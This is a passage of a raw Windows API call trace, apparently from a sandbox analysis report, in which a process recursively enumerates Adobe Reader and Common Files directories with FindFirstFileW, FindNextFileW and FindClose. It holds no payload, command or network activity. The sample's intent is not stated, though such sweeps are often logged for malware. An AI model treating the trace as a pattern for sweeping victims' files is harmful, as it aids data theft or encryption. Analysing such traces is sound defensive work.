(in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.897] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.898] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.898] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.899] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.899] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.899] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.899] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.900] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.900] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.901] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.901] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.901] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.901] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.902] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.902] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.902] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.902] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.903] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.904] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0138.905] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.905] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.907] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.907] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.907] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.907] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.908] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.909] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0138.909] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.909] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.910] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.910] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0138.910] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.910] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.910] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.910] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0138.912] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.913] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.922] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.925] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0138.937] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0138.939] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.939] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.939] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0138.941] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.941] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.943] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.946] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0138.947] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.949] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.986] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.989] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0138.990] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.991] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.997] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.997] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.997] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.998] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.998] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.998] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0138.999] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.999] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.999] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0139.001] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0139.003] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0139.038] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0139.041] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0139.042] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0139.042] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0139.042] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0139.042] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0139.042] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0139.042] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0139.044] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0139.044] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0139.083] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0139.087] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0139.087] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0139.087] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.088] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.089] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.089] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.089] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.090] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.090] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.090] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.090] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0139.090] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0139.090] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0139.090] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0139.091] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0139.091] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0139.092] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0139.092] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0139.092] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0139.092] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0139.092] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0139.094] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0139.094] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0139.096] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0139.100] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0139.101] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0139.101] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0139.106] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0139.109] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0139.111] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0139.111] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0139.113] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0139.116] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0139.117] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0139.117] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.117] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0139.117] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0139.117] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.117] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.117] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.118] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.118] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.126] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.129] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0139.129] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0139.129] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0139.129] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d60 [0139.130] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0139.130] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0139.130] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0139.130] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0139.130] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0139.130] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0139.130] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.130] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.130] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.131] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.131] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.131] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.131] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.143] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.146] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0139.147] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0139.147] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.147] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.147] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.147] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.147] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.147] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.147] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.147] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.147] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.147] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.147] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0139.147] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0139.149] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.149] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.149] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.150] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.150] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.150] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.150] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.151] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.151] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.151] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.152] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.155] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.155] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.155] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.156] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.156] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.156] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.157] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.157] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.157] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.157] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.157] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.157] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.158] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.158] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.158] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.158] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.159] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.159] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.159] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.159] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.160] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.160] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.160] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.160] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.161] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.161] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.161] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.161] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.162] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.162] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.162] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.162] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.163] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.163] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.163] 